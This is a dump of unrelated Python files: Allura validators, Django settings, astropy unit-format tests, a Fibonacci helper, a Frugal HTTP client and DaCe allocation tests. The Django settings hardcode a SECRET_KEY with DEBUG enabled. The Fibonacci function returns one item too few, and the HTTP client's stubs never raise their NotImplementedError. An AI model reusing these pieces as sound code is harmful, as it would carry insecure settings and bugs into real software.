raise fe.Invalid('Invalid task name. Please provide the full '
'dotted path to the python callable.', value, state)
try:
mod = __import__(mod, fromlist=[str(func)])
except ImportError:
raise fe.Invalid('Could not import "%s"' % value, value, state)
try:
task = getattr(mod, func)
except AttributeError:
raise fe.Invalid('Module has no attribute "%s"' %
func, value, state)
if not hasattr(task, 'post'):
raise fe.Invalid('"%s" is not a task.' % value, value, state)
return task
class UserValidator(fev.FancyValidator):
def _to_python(self, value, state):
from allura import model as M
user = M.User.by_username(value)
if not user:
raise fe.Invalid('Invalid username', value, state)
return user
class AnonymousValidator(fev.FancyValidator):
def _to_python(self, value, state):
from allura.model import User
if value:
if c.user == User.anonymous():
raise fe.Invalid('Log in to Mark as Private', value, state)
else:
return value
class PathValidator(fev.FancyValidator):
def _to_python(self, value, state):
from allura import model as M
parts = value.strip('/').split('/')
if len(parts) < 2:
raise fe.Invalid("You must specify at least a neighborhood and "
"project, i.e. '/nbhd/project'", value, state)
elif len(parts) == 2:
nbhd_name, project_name, app_name = parts[0], parts[1], None
elif len(parts) > 2:
nbhd_name, project_name, app_name = parts[0], parts[1], parts[2]
path_parts = {}
nbhd_url_prefix = '/%s/' % nbhd_name
nbhd = M.Neighborhood.query.get(url_prefix=nbhd_url_prefix)
if not nbhd:
raise fe.Invalid('Invalid neighborhood: %s' %
nbhd_url_prefix, value, state)
project = M.Project.query.get(
shortname=nbhd.shortname_prefix + project_name,
neighborhood_id=nbhd._id)
if not project:
raise fe.Invalid('Invalid project: %s' %
project_name, value, state)
path_parts['project'] = project
if app_name:
app = project.app_instance(app_name)
if not app:
raise fe.Invalid('Invalid app mount point: %s' %
app_name, value, state)
path_parts['app'] = app
return path_parts
class JsonValidator(fev.FancyValidator):
"""Validates a string as JSON and returns the original string"""
def _to_python(self, value, state):
try:
json.loads(value)
except ValueError, e:
raise fe.Invalid('Invalid JSON: ' + str(e), value, state)
return value
class JsonConverter(fev.FancyValidator):
"""Deserializes a string to JSON and returns a Python object"""
def _to_python(self, value, state):
try:
obj = json.loads(value)
except ValueError, e:
raise fe.Invalid('Invalid JSON: ' + str(e), value, state)
return obj
class JsonFile(fev.FieldStorageUploadConverter):
"""Validates that a file is JSON and returns the deserialized Python object
"""
def _to_python(self, value, state):
return JsonConverter.to_python(value.value)
class UserMapJsonFile(JsonFile):
"""Validates that a JSON file conforms to this format:
{str:str, ...}
and returns a deserialized or stringified copy of it.
"""
def __init__(self, as_string=False):
self.as_string = as_string
def _to_python(self, value, state):
value = super(self.__class__, self)._to_python(value, state)
try:
for k, v in value.iteritems():
if not(isinstance(k, basestring) and isinstance(v, basestring)):
raise
return json.dumps(value) if self.as_string else value
except:
raise fe.Invalid(
'User map file must contain mapping of {str:str, ...}',
value, state)
class CreateTaskSchema(fe.Schema):
task = TaskValidator(not_empty=True, strip=True)
task_args = JsonConverter(if_missing=dict(args=[], kwargs={}))
user = UserValidator(strip=True, if_missing=None)
path = PathValidator(strip=True, if_missing={}, if_empty={})
class CreateSiteNotificationSchema(fe.Schema):
active = fev.StringBool(if_missing=False)
impressions = fev.Int(not_empty=True)
content = fev.UnicodeString(not_empty=True)
user_role = fev.FancyValidator(not_empty=False, if_empty=None)
page_regex = fev.FancyValidator(not_empty=False, if_empty=None)
page_tool_type = fev.FancyValidator(not_empty=False, if_empty=None)
class DateValidator(fev.FancyValidator):
def _to_python(self, value, state):
value = convertDate(value)
if not value:
raise fe.Invalid(
"Please enter a valid date in the format DD/MM/YYYY.",
value, state)
return value
class TimeValidator(fev.FancyValidator):
def _to_python(self, value, state):
value = convertTime(value)
if not value:
raise fe.Invalid(
"Please enter a valid time in the format HH:MM.",
value, state)
return value
class OneOfValidator(fev.FancyValidator):
def __init__(self, validvalues, not_empty=True):
self.validvalues = validvalues
self.not_empty = not_empty
super(OneOfValidator, self).__init__()
def _to_python(self, value, state):
if not value.strip():
if self.not_empty:
raise fe.Invalid("This field can't be empty.", value, state)
else:
return None
if not value in self.validvalues:
allowed = ''
for v in self.validvalues:
if allowed != '':
allowed = allowed + ', '
allowed = allowed + '"%s"' % v
raise fe.Invalid(
"Invalid value. The allowed values are %s." % allowed,
value, state)
return value
class MapValidator(fev.FancyValidator):
def __init__(self, mapvalues, not_empty=True):
self.map = mapvalues
self.not_empty = not_empty
super(MapValidator, self).__init__()
def _to_python(self, value, state):
if not value.strip():
if self.not_empty:
raise fe.Invalid("This field can't be empty.", value, state)
else:
return None
conv_value = self.map.get(value)
if not conv_value:
raise fe.Invalid(
"Invalid value. Please, choose one of the valid values.",
value, state)
return conv_value
class YouTubeConverter(fev.FancyValidator):
"""Takes a given YouTube URL. Ensures that the video_id
is contained in the URL. Returns a clean URL to use for iframe embedding.
REGEX: http://stackoverflow.com/a/10315969/25690
"""
REGEX = ('^(?:https?:\/\/)?(?:www\.)?'+
'(?:youtu\.be\/|youtube\.com\/(?:embed\/|v\/|watch\?v=|watch\?.+&v=))'+
'((\w|-){11})(?:\S+)?$')
def _to_python(self, value, state):
match = re.match(YouTubeConverter.REGEX, value)
if match:
video_id = match.group(1)
return 'www.youtube.com/embed/{}?rel=0'.format(video_id)
else:
raise fe.Invalid(
"The URL does not appear to be a valid YouTube video.",
value, state)
def convertDate(datestring):
formats = ['%Y-%m-%d', '%Y.%m.%d', '%Y/%m/%d', '%Y\%m\%d', '%Y %m %d',
'%d-%m-%Y', '%d.%m.%Y', '%d/%m/%Y', '%d\%m\%Y', '%d %m %Y']
for f in formats:
try:
date = datetime.strptime(datestring, f)
return date
except:
pass
return None
def convertTime(timestring):
formats = ['%H:%M', '%H.%M', '%H %M', '%H,%M']
for f in formats:
try:
time = datetime.strptime(timestring, f)
return {'h': time.hour, 'm': time.minute}
except:
pass
return None
class IconValidator(fev.FancyValidator):
regex = '(jpg|jpeg|gif|png|bmp)$'
def _to_python(self, value, state):
p = re.compile(self.regex, flags=re.I)
result = p.search(value.filename)
if not result:
raise fe.Invalid(
'Project icons must be PNG, GIF, JPG, or BMP format.',
value, state)
return value
|
py | 1a38907fab023a06e7941995ac5cb49737f400e8 | # See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
DEBUG = True
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = '!$hfny5#0soe435!a)fhmv!egr)*8p*lkpv$^&e#=yxt&yd-wc'
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ensembl.production.masterdb',
'rest_framework',
'rest_framework_swagger',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ensembl_prodinf_masterdb.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ensembl_prodinf_masterdb.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': Path.joinpath(BASE_DIR.parent, 'db.sqlite3'),
}
}
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
|
py | 1a3892914637be23e4b0aeaf099deee0d6b9ef47 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Regression tests for the units.format package
"""
import pytest
from numpy.testing import assert_allclose
from astropy.tests.helper import catch_warnings
from astropy import units as u
from astropy.constants import si
from astropy.units import core
from astropy.units import format as u_format
from astropy.units.utils import is_effectively_unity
@pytest.mark.parametrize('strings, unit', [
(["m s", "m*s", "m.s"], u.m * u.s),
(["m/s", "m*s**-1", "m /s", "m / s", "m/ s"], u.m / u.s),
(["m**2", "m2", "m**(2)", "m**+2", "m+2", "m^(+2)"], u.m ** 2),
(["m**-3", "m-3", "m^(-3)", "/m3"], u.m ** -3),
(["m**(1.5)", "m(3/2)", "m**(3/2)", "m^(3/2)"], u.m ** 1.5),
(["2.54 cm"], u.Unit(u.cm * 2.54)),
(["10+8m"], u.Unit(u.m * 1e8)),
# This is the VOUnits documentation, but doesn't seem to follow the
# unity grammar (["3.45 10**(-4)Jy"], 3.45 * 1e-4 * u.Jy)
(["sqrt(m)"], u.m ** 0.5),
(["dB(mW)", "dB (mW)"], u.DecibelUnit(u.mW)),
(["mag"], u.mag),
(["mag(ct/s)"], u.MagUnit(u.ct / u.s)),
(["dex"], u.dex),
(["dex(cm s**-2)", "dex(cm/s2)"], u.DexUnit(u.cm / u.s**2))])
def test_unit_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.Generic.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', ['sin( /pixel /s)', 'mag(mag)',
'dB(dB(mW))', 'dex()'])
def test_unit_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.Generic.parse(string)
@pytest.mark.parametrize('strings, unit', [
(["0.1nm"], u.AA),
(["mW/m2"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["mW/(m2)"], u.Unit(u.erg / u.cm ** 2 / u.s)),
(["km/s", "km.s-1"], u.km / u.s),
(["10pix/nm"], u.Unit(10 * u.pix / u.nm)),
(["1.5x10+11m"], u.Unit(1.5e11 * u.m)),
(["1.5ร10+11m"], u.Unit(1.5e11 * u.m)),
(["m2"], u.m ** 2),
(["10+21m"], u.Unit(u.m * 1e21)),
(["2.54cm"], u.Unit(u.cm * 2.54)),
(["20%"], 0.20 * u.dimensionless_unscaled),
(["10+9"], 1.e9 * u.dimensionless_unscaled),
(["2x10-9"], 2.e-9 * u.dimensionless_unscaled),
(["---"], u.dimensionless_unscaled),
(["ma"], u.ma),
(["mAU"], u.mAU),
(["uarcmin"], u.uarcmin),
(["uarcsec"], u.uarcsec),
(["kbarn"], u.kbarn),
(["Gbit"], u.Gbit),
(["Gibit"], 2 ** 30 * u.bit),
(["kbyte"], u.kbyte),
(["mRy"], 0.001 * u.Ry),
(["mmag"], u.mmag),
(["Mpc"], u.Mpc),
(["Gyr"], u.Gyr),
(["ยฐ"], u.degree),
(["ยฐ/s"], u.degree / u.s),
(["ร
"], u.AA),
(["ร
/s"], u.AA / u.s),
(["\\h"], si.h)])
def test_cds_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.CDS.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'0.1 nm',
'solMass(3/2)',
'km / s',
'km s-1',
'pix0.1nm',
'pix/(0.1nm)',
'km*s',
'km**2',
'5x8+3m',
'0.1---',
'---m',
'm---',
'mag(s-1)',
'dB(mW)',
'dex(cm s-2)'])
def test_cds_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.CDS.parse(string)
# These examples are taken from the EXAMPLES section of
# https://heasarc.gsfc.nasa.gov/docs/heasarc/ofwg/docs/general/ogip_93_001/
@pytest.mark.parametrize('strings, unit', [
(["count /s", "count/s", "count s**(-1)", "count / s", "count /s "],
u.count / u.s),
(["/pixel /s", "/(pixel * s)"], (u.pixel * u.s) ** -1),
(["count /m**2 /s /eV", "count m**(-2) * s**(-1) * eV**(-1)",
"count /(m**2 * s * eV)"],
u.count * u.m ** -2 * u.s ** -1 * u.eV ** -1),
(["erg /pixel /s /GHz", "erg /s /GHz /pixel", "erg /pixel /(s * GHz)"],
u.erg / (u.s * u.GHz * u.pixel)),
(["keV**2 /yr /angstrom", "10**(10) keV**2 /yr /m"],
# Though this is given as an example, it seems to violate the rules
# of not raising scales to powers, so I'm just excluding it
# "(10**2 MeV)**2 /yr /m"
u.keV**2 / (u.yr * u.angstrom)),
(["10**(46) erg /s", "10**46 erg /s", "10**(39) J /s", "10**(39) W",
"10**(15) YW", "YJ /fs"],
10**46 * u.erg / u.s),
(["10**(-7) J /cm**2 /MeV", "10**(-9) J m**(-2) eV**(-1)",
"nJ m**(-2) eV**(-1)", "nJ /m**2 /eV"],
10 ** -7 * u.J * u.cm ** -2 * u.MeV ** -1),
(["sqrt(erg /pixel /s /GHz)", "(erg /pixel /s /GHz)**(0.5)",
"(erg /pixel /s /GHz)**(1/2)",
"erg**(0.5) pixel**(-0.5) s**(-0.5) GHz**(-0.5)"],
(u.erg * u.pixel ** -1 * u.s ** -1 * u.GHz ** -1) ** 0.5),
(["(count /s) (/pixel /s)", "(count /s) * (/pixel /s)",
"count /pixel /s**2"],
(u.count / u.s) * (1.0 / (u.pixel * u.s)))])
def test_ogip_grammar(strings, unit):
for s in strings:
print(s)
unit2 = u_format.OGIP.parse(s)
assert unit2 == unit
@pytest.mark.parametrize('string', [
'log(photon /m**2 /s /Hz)',
'sin( /pixel /s)',
'log(photon /cm**2 /s /Hz) /(sin( /pixel /s))',
'log(photon /cm**2 /s /Hz) (sin( /pixel /s))**(-1)',
'dB(mW)', 'dex(cm/s**2)'])
def test_ogip_grammar_fail(string):
with pytest.raises(ValueError):
print(string)
u_format.OGIP.parse(string)
@pytest.mark.parametrize('unit', [val for key, val in u.__dict__.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip(unit):
a = core.Unit(unit.to_string('generic'), format='generic')
b = core.Unit(unit.decompose().to_string('generic'), format='generic')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.VOUnit._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_vo_unit(unit):
a = core.Unit(unit.to_string('vounit'), format='vounit')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
if unit not in (u.mag, u.dB):
ud = unit.decompose().to_string('vounit')
assert ' ' not in ud
b = core.Unit(ud, format='vounit')
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.Fits._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_fits(unit):
s = unit.to_string('fits')
a = core.Unit(s, format='fits')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.CDS._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_cds(unit):
a = core.Unit(unit.to_string('cds'), format='cds')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('cds'), format='cds')
except ValueError: # skip mag: decomposes into dex, unknown to OGIP
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
@pytest.mark.parametrize('unit', [
val for key, val in u_format.OGIP._units.items()
if (isinstance(val, core.UnitBase) and
not isinstance(val, core.PrefixUnit))])
def test_roundtrip_ogip(unit):
a = core.Unit(unit.to_string('ogip'), format='ogip')
assert_allclose(a.decompose().scale, unit.decompose().scale, rtol=1e-2)
try:
b = core.Unit(unit.decompose().to_string('ogip'), format='ogip')
except ValueError: # skip mag: decomposes into dex, unknown to OGIP
return
assert_allclose(b.decompose().scale, unit.decompose().scale, rtol=1e-2)
def test_fits_units_available():
u_format.Fits._units
def test_vo_units_available():
u_format.VOUnit._units
def test_cds_units_available():
u_format.CDS._units
def test_cds_non_ascii_unit():
"""Regression test for #5350. This failed with a decoding error as
ฮผas could not be represented in ascii."""
from astropy.units import cds
with cds.enable():
u.radian.find_equivalent_units(include_prefix_units=True)
def test_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert fluxunit.to_string('latex') == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_new_style_latex():
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert "{0:latex}".format(fluxunit) == r'$\mathrm{\frac{erg}{s\,cm^{2}}}$'
def test_latex_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex = r'$\mathrm{1 \times 10^{-24}\,\frac{erg}{Hz\,s\,cm^{2}}}$'
assert fluxunit.to_string('latex') == latex
def test_latex_inline_scale():
fluxunit = u.Unit(1.e-24 * u.erg / (u.cm ** 2 * u.s * u.Hz))
latex_inline = (r'$\mathrm{1 \times 10^{-24}\,erg'
r'\,Hz^{-1}\,s^{-1}\,cm^{-2}}$')
assert fluxunit.to_string('latex_inline') == latex_inline
@pytest.mark.parametrize('format_spec, string', [
('generic', 'erg / (cm2 s)'),
('s', 'erg / (cm2 s)'),
('console', ' erg \n ------\n s cm^2'),
('latex', '$\\mathrm{\\frac{erg}{s\\,cm^{2}}}$'),
('latex_inline', '$\\mathrm{erg\\,s^{-1}\\,cm^{-2}}$'),
('>20s', ' erg / (cm2 s)')])
def test_format_styles(format_spec, string):
fluxunit = u.erg / (u.cm ** 2 * u.s)
assert format(fluxunit, format_spec) == string
def test_flatten_to_known():
myunit = u.def_unit("FOOBAR_One", u.erg / u.Hz)
assert myunit.to_string('fits') == 'erg Hz-1'
myunit2 = myunit * u.bit ** 3
assert myunit2.to_string('fits') == 'bit3 erg Hz-1'
def test_flatten_impossible():
myunit = u.def_unit("FOOBAR_Two")
with u.add_enabled_units(myunit), pytest.raises(ValueError):
myunit.to_string('fits')
def test_console_out():
"""
Issue #436.
"""
u.Jy.decompose().to_string('console')
def test_flexible_float():
assert u.min._represents.to_string('latex') == r'$\mathrm{60\,s}$'
def test_fraction_repr():
area = u.cm ** 2.0
assert '.' not in area.to_string('latex')
fractional = u.cm ** 2.5
assert '5/2' in fractional.to_string('latex')
assert fractional.to_string('unicode') == 'cmโตโธยฒ'
def test_scale_effectively_unity():
"""Scale just off unity at machine precision level is OK.
Ensures #748 does not recur
"""
a = (3. * u.N).cgs
assert is_effectively_unity(a.unit.scale)
assert len(a.__repr__().split()) == 3
def test_percent():
"""Test that the % unit is properly recognized. Since % is a special
symbol, this goes slightly beyond the round-tripping tested above."""
assert u.Unit('%') == u.percent == u.Unit(0.01)
assert u.Unit('%', format='cds') == u.Unit(0.01)
assert u.Unit(0.01).to_string('cds') == '%'
with pytest.raises(ValueError):
u.Unit('%', format='fits')
with pytest.raises(ValueError):
u.Unit('%', format='vounit')
def test_scaled_dimensionless():
"""Test that scaled dimensionless units are properly recognized in generic
and CDS, but not in fits and vounit."""
assert u.Unit('0.1') == u.Unit(0.1) == 0.1 * u.dimensionless_unscaled
assert u.Unit('1.e-4') == u.Unit(1.e-4)
assert u.Unit('10-4', format='cds') == u.Unit(1.e-4)
assert u.Unit('10+8').to_string('cds') == '10+8'
with pytest.raises(ValueError):
u.Unit(0.15).to_string('fits')
assert u.Unit(0.1).to_string('fits') == '10**-1'
with pytest.raises(ValueError):
u.Unit(0.1).to_string('vounit')
def test_deprecated_did_you_mean_units():
try:
u.Unit('ANGSTROM', format='fits')
except ValueError as e:
assert 'Did you mean Angstrom or angstrom?' in str(e)
try:
u.Unit('crab', format='ogip')
except ValueError as e:
assert 'Crab (deprecated)' in str(e)
assert 'mCrab (deprecated)' in str(e)
try:
u.Unit('ANGSTROM', format='vounit')
except ValueError as e:
assert 'angstrom (deprecated)' in str(e)
assert '0.1nm' in str(e)
assert str(e).count('0.1nm') == 1
with catch_warnings() as w:
u.Unit('angstrom', format='vounit')
assert len(w) == 1
assert '0.1nm' in str(w[0].message)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_fits_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.Fits().parse(string)
@pytest.mark.parametrize('string', ['mag(ct/s)', 'dB(mW)', 'dex(cm s**-2)'])
def test_vounit_function(string):
# Function units cannot be written, so ensure they're not parsed either.
with pytest.raises(ValueError):
print(string)
u_format.VOUnit().parse(string)
def test_vounit_binary_prefix():
u.Unit('KiB', format='vounit') == u.Unit('1024 B')
u.Unit('Kibyte', format='vounit') == u.Unit('1024 B')
u.Unit('Kibit', format='vounit') == u.Unit('1024 B')
with catch_warnings() as w:
u.Unit('kibibyte', format='vounit')
assert len(w) == 1
def test_vounit_unknown():
assert u.Unit('unknown', format='vounit') is None
assert u.Unit('UNKNOWN', format='vounit') is None
assert u.Unit('', format='vounit') is u.dimensionless_unscaled
def test_vounit_details():
assert u.Unit('Pa', format='vounit') is u.Pascal
# The da- prefix is not allowed, and the d- prefix is discouraged
assert u.dam.to_string('vounit') == '10m'
assert u.Unit('dam dag').to_string('vounit') == '100g m'
def test_vounit_custom():
x = u.Unit("'foo' m", format='vounit')
x_vounit = x.to_string('vounit')
assert x_vounit == "'foo' m"
x_string = x.to_string()
assert x_string == "foo m"
x = u.Unit("m'foo' m", format='vounit')
assert x.bases[1]._represents.scale == 0.001
x_vounit = x.to_string('vounit')
assert x_vounit == "m m'foo'"
x_string = x.to_string()
assert x_string == 'm mfoo'
def test_vounit_implicit_custom():
x = u.Unit("furlong/week", format="vounit")
assert x.bases[0]._represents.scale == 1e-15
assert x.bases[0]._represents.bases[0].name == 'urlong'
def test_fits_scale_factor():
with pytest.raises(ValueError):
x = u.Unit('1000 erg/s/cm**2/Angstrom', format='fits')
with pytest.raises(ValueError):
x = u.Unit('12 erg/s/cm**2/Angstrom', format='fits')
x = u.Unit('10+2 erg/s/cm**2/Angstrom', format='fits')
assert x == 100 * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**2 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^(-20) erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10^-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10-20 erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
assert x.to_string(format='fits') == '10**-20 Angstrom-1 cm-2 erg s-1'
x = u.Unit('10**(-20)*erg/s/cm**2/Angstrom', format='fits')
assert x == 10**(-20) * (u.erg / u.s / u.cm ** 2 / u.Angstrom)
x = u.Unit(1.2 * u.erg)
with pytest.raises(ValueError):
x.to_string(format='fits')
x = u.Unit(100.0 * u.erg)
assert x.to_string(format='fits') == '10**2 erg'
|
py | 1a38956b8d371c7fbccf06cc2d86392ad48311e8 | def fibonacciSequence(N):
result = []
previous = 1
previousPrevious = 1
result.append(1)
result.append(1)
for i in range(N - 3):
current = previous + previousPrevious
result.append(current)
previousPrevious = previous
previous = current
return result
print(fibonacciSequence(100))
|
py | 1a38968825a4396c1a505912a2aa02140bcb7bde | """
API til GNU Gama-funktionalitet.
"""
from .writer import GamaWriter
from .reader import GamaReader
|
py | 1a38978961e42a535a383c0da3e34066bbe3f377 | """
Copyright (c) 2019 4masaka
This software is released under the MIT License.
https://opensource.org/licenses/MIT
"""
from typing import Dict, Optional
import aiohttp
from frugal.aio.transport import FTransportBase
from frugal.context import FContext
from thrift.transport.TTransport import TMemoryBuffer, TTransportBase
class HttpClient(FTransportBase):
def __init__(
self, uri: str, headers: Optional[Dict] = None, request_capacity: int = 0
) -> None:
super().__init__(request_capacity)
self.uri = uri
self.headers = {
"Content-Type": "application/x-thrift",
"Accept": "application/x-thrift",
}
self.headers.update(headers)
def is_open(self) -> bool:
return True
def open(self) -> None:
return True
async def close(self) -> None:
NotImplementedError()
async def oneway(self, context, payload):
NotImplementedError()
async def set_monitor(self, monitor):
NotImplementedError()
async def request(self, context: FContext, payload) -> TTransportBase:
payload = payload[4:]
async with aiohttp.request(
"POST",
url=self.uri,
data=payload,
headers=self.headers
) as res:
return TMemoryBuffer(await res.content.read())
class HttpClientFactory:
def __init__(self, host: str, port: int = 443, scheme: str = "https"):
self.host = host
self.port = port
self.scheme = scheme
def get_client(self, path: str, headers: Optional[Dict] = None) -> HttpClient:
uri = f"{self.scheme}://{self.host}:{self.port}{path}"
return HttpClient(uri, headers=headers)
|
py | 1a38983193d08097937e4cf51a38b10917649e06 | # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
""" Tests different allocation lifetimes. """
import pytest
import dace
from dace.codegen.targets import framecode
from dace.sdfg import infer_types
import numpy as np
N = dace.symbol('N')
def _test_determine_alloc(lifetime: dace.AllocationLifetime, unused: bool = False) -> dace.SDFG:
""" Creates an SDFG playground for determining allocation. """
sdfg = dace.SDFG('lifetimetest')
sdfg.add_array('A', [N], dace.float64)
sdfg.add_array('B', [N], dace.float64)
sdfg.add_transient('unused', [N], dace.float64, lifetime=lifetime)
state = sdfg.add_state()
me, mx = state.add_map('m', dict(i='0:N'))
#########################################################################
nsdfg = dace.SDFG('nested')
nsdfg.add_array('A', [N], dace.float64)
nsdfg.add_array('B', [N], dace.float64)
nsdfg.add_transient('tmp', [N], dace.float64, dace.StorageType.GPU_Global, lifetime=lifetime)
nsdfg.add_transient('tmp2', [1], dace.float64, dace.StorageType.Register, lifetime=lifetime)
nstate = nsdfg.add_state()
ime, imx = nstate.add_map('m2', dict(i='0:20'), schedule=dace.ScheduleType.GPU_Device)
t1 = nstate.add_access('tmp')
t2 = nstate.add_access('tmp2')
nstate.add_nedge(t1, t2, dace.Memlet('tmp[0]'))
nstate.add_memlet_path(nstate.add_read('A'), ime, t1, memlet=dace.Memlet('A[i]'))
nstate.add_memlet_path(t2, imx, nstate.add_write('B'), memlet=dace.Memlet('B[0]', wcr='lambda a,b: a+b'))
#########################################################################
nsdfg_node = state.add_nested_sdfg(nsdfg, None, {'A'}, {'B'})
state.add_memlet_path(state.add_read('A'), me, nsdfg_node, dst_conn='A', memlet=dace.Memlet('A[0:N]'))
state.add_memlet_path(nsdfg_node, mx, state.add_write('B'), src_conn='B', memlet=dace.Memlet('B[0:N]'))
# Set default storage/schedule types in SDFG
infer_types.set_default_schedule_and_storage_types(sdfg, None)
return sdfg, (sdfg, state, me, nsdfg, nstate, ime)
def _check_alloc(id, name, codegen, scope):
# for sdfg_id, _, node in codegen.to_allocate[scope]:
# if id == sdfg_id and name == node.data:
# return True
for sdfg, _, node, _, _, _ in codegen.to_allocate[scope]:
if sdfg.sdfg_id == id and name == node.data:
return True
return False
def test_determine_alloc_scope():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Scope)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# tmp cannot be allocated within the inner scope because it is GPU_Global
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-1])
def test_determine_alloc_state():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.State, unused=True)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
# Ensure that unused transients are not allocated
assert not any('__0_unused' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, scopes[-2])
assert _check_alloc(1, 'tmp2', codegen, scopes[-2])
def test_determine_alloc_sdfg():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.SDFG)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert _check_alloc(1, 'tmp', codegen, scopes[-3])
assert _check_alloc(1, 'tmp2', codegen, scopes[-3])
def test_determine_alloc_global():
sdfg, scopes = _test_determine_alloc(dace.AllocationLifetime.Global)
codegen = framecode.DaCeCodeGenerator()
codegen.determine_allocation_lifetime(sdfg)
assert any('__1_tmp' in field for field in codegen.statestruct)
assert any('__1_tmp2' in field for field in codegen.statestruct)
assert _check_alloc(1, 'tmp', codegen, sdfg)
assert _check_alloc(1, 'tmp2', codegen, sdfg)
@pytest.mark.gpu
def test_persistent_gpu_copy_regression():
sdfg = dace.SDFG('copynd')
state = sdfg.add_state()
nsdfg = dace.SDFG('copynd_nsdfg')
nstate = nsdfg.add_state()
sdfg.add_array("input", [2, 2], dace.float64)
sdfg.add_array("input_gpu", [2, 2],
dace.float64,
transient=True,
storage=dace.StorageType.GPU_Global,
lifetime=dace.AllocationLifetime.Persistent)
sdfg.add_array("__return", [2, 2], dace.float64)
